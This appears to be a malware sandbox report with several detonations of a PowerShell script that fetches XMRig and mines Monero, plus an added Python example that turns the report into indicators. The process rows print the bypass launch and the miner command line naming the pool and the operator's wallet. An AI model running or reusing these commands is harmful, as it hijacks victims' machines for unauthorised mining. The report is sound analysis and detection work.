SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2292-46-0x0000027876AD0000-0x0000027876AF0000-memory.dmp

memory/2292-47-0x0000027876D20000-0x0000027876D40000-memory.dmp

memory/2292-48-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2936-49-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp

memory/2936-50-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2292-53-0x0000027878510000-0x0000027878530000-memory.dmp

memory/2292-52-0x0000027876D40000-0x0000027876D60000-memory.dmp

memory/2292-51-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2936-54-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2292-55-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-56-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-58-0x0000027878510000-0x0000027878530000-memory.dmp

memory/2292-57-0x0000027876D40000-0x0000027876D60000-memory.dmp

memory/2292-59-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-60 to memory/2292-117: 58 further dumps of the same region, 0x00007FF7B3C50000-0x00007FF7B4883000

Analysis: behavioral11

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:03

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 rule matches recorded, no description, indicator, process or target captured (all fields N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4076,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=1276 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5032,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 136.71.105.51.in-addr.arpa udp

Files

memory/1624-0-0x00007FF94B923000-0x00007FF94B925000-memory.dmp

memory/1624-1-0x0000012622E30000-0x0000012622E52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iculwlv4.gso.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1624-11-0x00007FF94B920000-0x00007FF94C3E1000-memory.dmp

memory/1624-12-0x00007FF94B920000-0x00007FF94C3E1000-memory.dmp

memory/1624-14-0x00007FF94B920000-0x00007FF94C3E1000-memory.dmp

memory/1624-15-0x00000126231C0000-0x00000126231D2000-memory.dmp

memory/1624-16-0x00000126231A0000-0x00000126231AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3540-47-0x000002899C000000-0x000002899C020000-memory.dmp

memory/3540-48-0x000002899D760000-0x000002899D780000-memory.dmp

memory/3540-49-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-50-0x000002899D780000-0x000002899D7A0000-memory.dmp

memory/3540-51-0x000002899D7A0000-0x000002899D7C0000-memory.dmp

memory/1624-53-0x00007FF94B923000-0x00007FF94B925000-memory.dmp

memory/3540-52-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/1624-54-0x00007FF94B920000-0x00007FF94C3E1000-memory.dmp

memory/1624-56-0x00007FF94B920000-0x00007FF94C3E1000-memory.dmp

memory/3540-55-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-57-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-59-0x000002899D7A0000-0x000002899D7C0000-memory.dmp

memory/3540-58-0x000002899D780000-0x000002899D7A0000-memory.dmp

memory/3540-60-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-61 to memory/3540-118: 58 further dumps of the same region, 0x00007FF623FA0000-0x00007FF624BD3000

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 07:56

Platform

win10v2004-20240611-en

Max time kernel

1789s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 rule matches recorded, no description, indicator, process or target captured (all fields N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
GB 184.28.176.90:443 www.bing.com tcp
US 8.8.8.8:53 90.176.28.184.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 63.141.182.52.in-addr.arpa udp
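
The rows above carry everything needed to turn this detonation into indicators, but the report leaves the correlation to the reader. The Python below is an added example, not tooling from the sandbox or from the sample: it flags the PowerShell launch (execution-policy bypass on a script under the user's Temp directory), pulls the pool and wallet out of the xmrig command line, checks the wallet against Monero's address format (95 characters of base58 starting with 4 or 8, or a 106-character integrated address), keeps only TCP endpoints from the Network table (the 8.8.8.8:53 queries and in-addr.arpa reverse lookups are resolver noise) and singles out the endpoint whose domain matches the pool named on the command line, and flags the SeLockMemoryPrivilege request coming from a binary in Temp. The process, network and token rows are copied from this analysis (the duplicated SeLockMemoryPrivilege row collapsed to one); the function names and the heuristics are the example's own.

```python
"""Turn sandbox report rows into miner indicators (added example, not report tooling)."""
import json
import re
from typing import Dict, List, Optional, Tuple

# Rows copied from this analysis. Network columns: country, destination, domain, proto.
PROCESS_CMDLINES = [
    'powershell.exe -ExecutionPolicy bypass -File '
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\file01 - copia (10) - copia.ps1"',
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe" '
    '-o gulf.moneroocean.stream:10128 '
    '-u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF',
]
NETWORK_TABLE = """\
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
"""
# (privilege, process) pairs from the "Suspicious use of AdjustPrivilegeToken" table.
TOKEN_ROWS: List[Tuple[str, str]] = [
    ("SeDebugPrivilege", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"),
    ("SeLockMemoryPrivilege", "C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe"),
]

BASE58 = r"[1-9A-HJ-NP-Za-km-z]"          # Bitcoin-style base58: no 0, O, I, l
USER_TEMP = re.compile(r"\\appdata\\local\\temp\\", re.I)


def is_monero_address(s: str) -> bool:
    """Standard address or subaddress (95 chars, prefix 4/8) or integrated address (106, prefix 4)."""
    return bool(re.fullmatch(rf"[48]{BASE58}{{94}}", s) or re.fullmatch(rf"4{BASE58}{{105}}", s))


def parse_miner_cmdline(cmdline: str) -> Optional[Dict[str, str]]:
    """Extract pool host:port (-o/--url) and wallet (-u/--user) from an xmrig-style command line."""
    pool = re.search(r"(?:\s-o\s+|--url[= ])(?:stratum\+(?:tcp|ssl)://)?([\w.-]+):(\d+)", cmdline)
    user = re.search(r"(?:\s-u\s+|--user[= ])(\S+)", cmdline)
    if not (pool and user):
        return None
    return {"pool_host": pool.group(1), "pool_port": pool.group(2), "wallet": user.group(1)}


def is_bypass_powershell(cmdline: str) -> bool:
    """PowerShell started with ExecutionPolicy Bypass/Unrestricted on a script in the user's Temp."""
    c = cmdline.lower()
    policy = re.search(r"-e[a-z]*\s+(bypass|unrestricted)", c)   # -ep, -exec, -executionpolicy
    script = re.search(r'-file\s+"?[^"]*\\appdata\\local\\temp\\', c)
    return bool(policy and script)


def parse_network_table(text: str) -> List[Dict[str, str]]:
    """Split the report's flattened four-column Network table into rows."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        country, dest, domain, proto = parts
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": port, "domain": domain, "proto": proto})
    return rows


def network_iocs(rows: List[Dict[str, str]], pool_host: Optional[str]) -> Dict[str, List[str]]:
    """Keep TCP endpoints only (DNS queries and reverse lookups are sandbox noise) and
    single out the one whose domain matches the pool named on the miner's command line."""
    out: Dict[str, List[str]] = {"pool_endpoints": [], "other_tcp_endpoints": []}
    for r in rows:
        if r["proto"] != "tcp" or r["domain"].endswith(".in-addr.arpa"):
            continue
        key = "pool_endpoints" if r["domain"] == pool_host else "other_tcp_endpoints"
        out[key].append(f'{r["ip"]}:{r["port"]}')
    return out


def lock_memory_from_temp(token_rows: List[Tuple[str, str]]) -> List[str]:
    """SeLockMemoryPrivilege is what xmrig requests to back its scratchpad with large pages.
    Database servers ask for it too, but from an installed service, not from a file in %TEMP%."""
    return [p for priv, p in token_rows if priv == "SeLockMemoryPrivilege" and USER_TEMP.search(p)]


def summarize(cmdlines: List[str], network_text: str,
              token_rows: List[Tuple[str, str]]) -> Dict[str, object]:
    """Correlate the three tables into one indicator record."""
    miner = None
    for c in cmdlines:
        miner = parse_miner_cmdline(c)
        if miner:
            break
    rows = parse_network_table(network_text)
    return {
        "powershell_bypass": any(is_bypass_powershell(c) for c in cmdlines),
        "miner": miner,
        "wallet_valid": bool(miner and is_monero_address(miner["wallet"])),
        "network": network_iocs(rows, miner["pool_host"] if miner else None),
        "large_pages_from_temp": lock_memory_from_temp(token_rows),
    }


if __name__ == "__main__":
    print(json.dumps(summarize(PROCESS_CMDLINES, NETWORK_TABLE, TOKEN_ROWS), indent=2))
```

Run against the other detonations on this page, the script yields the same pool endpoint 149.102.143.109:10128 and the same wallet; only the GitHub CDN address (185.199.108.133, .109.133 or .110.133) varies between runs. The wallet is the durable indicator: a public pool's IP and port are shared infrastructure that the operator can swap without touching the payload, while the wallet is where the proceeds go.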

Files

memory/1108-0-0x00007FFB832B3000-0x00007FFB832B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xuz0jgmb.coh.psm1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

This file is written by PowerShell itself when it checks whether AppLocker/WDAC script enforcement is active; its content is fixed, so the same hashes recur in every run on this page and are not indicators for the sample. The dropped xmrig.exe below is the file worth hashing.

memory/1108-6-0x0000025D74D10000-0x0000025D74D32000-memory.dmp

memory/1108-11-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp

memory/1108-12-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp

memory/1108-14-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp

memory/1108-15-0x0000025D75AE0000-0x0000025D75AF2000-memory.dmp

memory/1108-16-0x0000025D74D60000-0x0000025D74D6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3728-47-0x000001C21CC30000-0x000001C21CC50000-memory.dmp

memory/3728-48-0x000001C21E430000-0x000001C21E450000-memory.dmp

memory/3728-49-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/1108-50-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp

memory/3728-51-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-53-0x000001C21E450000-0x000001C21E470000-memory.dmp

memory/1108-52-0x00007FFB832B3000-0x00007FFB832B5000-memory.dmp

memory/3728-54-0x000001C21E470000-0x000001C21E490000-memory.dmp

memory/1108-55-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp

memory/3728-56-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-58-0x000001C21E450000-0x000001C21E470000-memory.dmp

memory/3728-57-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-59-0x000001C21E470000-0x000001C21E490000-memory.dmp

memory/3728-60-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-61-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-62-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-63-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-64-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-65-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-66-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-67-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-68-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-69-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-70-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-71-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-72-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-73-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-74-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-75-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-76-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-77-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-78-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-79-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-80-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-81-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-82-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-83-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-84-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-85-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-86-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-87-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-88-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-89-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-90-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-91-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-92-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-93-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-94-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-95-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-96-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-97-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-98-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-99-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-100-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-101-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-102-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-103-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-104-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-105-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-106-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-107-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-108-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-109-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-110-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-111-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-112-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-113-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-114-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-115-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-116-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-117-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-118-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:26

Platform

win11-20240611-en

Max time kernel

1794s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp

Files

memory/1484-0-0x00007FFB5D213000-0x00007FFB5D215000-memory.dmp

memory/1484-6-0x0000019538750000-0x0000019538772000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sd4po5nh.yjq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1484-10-0x00007FFB5D210000-0x00007FFB5DCD2000-memory.dmp

memory/1484-11-0x00007FFB5D210000-0x00007FFB5DCD2000-memory.dmp

memory/1484-12-0x00007FFB5D210000-0x00007FFB5DCD2000-memory.dmp

memory/1484-14-0x00000195387F0000-0x0000019538802000-memory.dmp

memory/1484-15-0x00000195387E0000-0x00000195387EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2628-46-0x00000193685F0000-0x0000019368610000-memory.dmp

memory/2628-47-0x0000019368640000-0x0000019368660000-memory.dmp

memory/2628-48-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/1484-49-0x00007FFB5D210000-0x00007FFB5DCD2000-memory.dmp

memory/1484-51-0x00007FFB5D213000-0x00007FFB5D215000-memory.dmp

memory/2628-50-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-53-0x0000019368660000-0x0000019368680000-memory.dmp

memory/2628-54-0x0000019368680000-0x00000193686A0000-memory.dmp

memory/1484-52-0x00007FFB5D210000-0x00007FFB5DCD2000-memory.dmp

memory/2628-55-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-56-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-58-0x0000019368680000-0x00000193686A0000-memory.dmp

memory/2628-57-0x0000019368660000-0x0000019368680000-memory.dmp

memory/2628-59-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-60-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

